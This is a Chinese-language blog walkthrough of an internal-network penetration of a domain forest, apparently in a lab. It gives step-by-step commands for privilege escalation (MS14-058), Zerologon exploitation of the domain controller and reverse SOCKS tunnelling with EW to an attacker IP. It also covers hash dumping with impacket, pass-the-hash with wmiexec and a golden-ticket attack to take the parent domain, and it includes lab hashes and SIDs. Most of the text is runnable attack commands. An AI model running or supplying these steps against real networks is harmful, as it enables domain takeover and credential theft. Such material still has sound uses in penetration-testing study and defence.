内网渗透：域森林实战

Delina

原文链接：内网渗透：域森林实战
​
内网渗透：域森林实战

​

模拟内网实战，以钓鱼已进入内网开始
cs生成exe上线web服务器

​

设置beacon响应时间为0

​

第一步:提权
利用ms14-058进行提权

​

提权成功

​

进行arp协议信息收集
作用：查看是否有多网卡
指令：
shellarp -a

​

查看主机信息
作用：可以看到有域，查看补丁进行对应的提权
指令：
shellsysteminfo
​
收集网络全部信息
作用：可以看到主机名，域信息
指令：
shellipconfig /all
​
利用nbtscan扫描
作用：扫出真实内网ip进行下一步渗透
​

​

进行mimikatz上传
作用：方便进一步内网渗透

​

扫描是否存在cve2020-1472
回应存在
指令:
lsadump::zerologon /target:域控IP /account:域控主机名$shell mimikatz "
lsadump::zerologon /target:10.10.3.6  /account:ziyu$""exit"​
上传ew进行代理
指令：

• 
  

ew_for_Win.exe -s rcsocks -l 1080 -e 888
//将映射出的888端口返回到本地的1080端口

​

反向碰撞
原理：
我们攻击机开启了代理准备，也就是我们把888端口放到门口，谁指定我们的ip加这个端口碰撞便进行了代理连接
指令：

• 
  

shellew_for_Win.exe  -s rssocks -d 192.168.58.1（攻击机ip）-e888

​

利用cve2020将域控密码置空
指令：
lsadump::zerologon /target:域控IP /account:域控主机名$ /exploitshell mimikatz "
lsadump::zerologon  /target:10.10.3.6  /account:ziyu$ /exploit" "exit"

​

​​
kali设置代理，这里就是对应之前的代理设置，我们将888放到门口被撞，1080则为我们自己用

​

获取散列值
作用：制作票据，破解md5等等都可以，个人比较喜欢黄金票据
指令：

• 
  

proxychains impacket-secretsdump -no-pass -just-dcxiyou.dayu.com/ZIYU\$@10.10.3.6

​

利用wmiexec连接
作用：连接域控制器了
指令：
proxychainspython3 wmiexec.py -hashes :e35c2b2d95f6ae63b75dbbff5195accb./Administrator@10.10.3.6

​

将sam system security.save文件先导出后下载下来,并清理痕迹
指令：
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.saveget system.save ++​
获取散列值
作用：获得各用户hash以及还原域防止出现问题
指令：
impacket-secretsdump-sam sam.save -system system.save -security security.save LOCAL
​
进行还原
指令：

• 
  

proxychain spython3 reinstall_original_pw.py ZIYU 10.10.3.675df0c2187b6a79e46f26fa2fb16573a

​

这个时候再用之前获取到的管理员hash登录域控
指令：

• 
  

proxychains python3 wmiexec.py -hashesaad3b435b51404eeaad3b435b51404ee:e35c2b2d95f6ae63b75dbbff5195accbxiyou.dayu.com/dayu@10.10.3.6

​

查看网卡信息，是否进攻正确
​
上线cs做中转，生成exe进行上线
​
kali直接上传上线

​

​

进行信息收集，这里21段机子未开

​

​
上传mimikatz利用信任关系制作票据进行攻击
先获取父子域sid
指令：

• 
  

shell mimikatz "privilege::debug" "lsadump::lsa /patch/user:dayu$" "lsadump::trust /patch" "exit"
子域：S-1-5-21-4076297317-3311262154-314974380
父域：S-1-5-21-3309395417-4108617856-2168433834-519
krbtgt哈希值：c696e9337845d8ada46612d047e40209

​

进行黄金票据攻击
显示成功
指令：

• 
  

shell "kerberos::golden /user:administrator /domain:xiyou.dayu.com/sid:S-1-5-21-4076297317-3311262154-314974380/sids:S-1-5-21-3309395417-4108617856-2168433834-519/krbtgt:c696e9337845d8ada46612d047e40209  /ptt" "exit"
​
但是这里是失败了
创建域管理员账号

​

直接通过3389进行黄金票据

​

终于也是成功了
接着利用wmiexec进行父域的访问
指令：

• 
  

wmiexec.exe administratorWEasd123@10.10.3.5

​

上传2.exe进行运行上线cs

​

这一套直线内网流程就结束收工了
​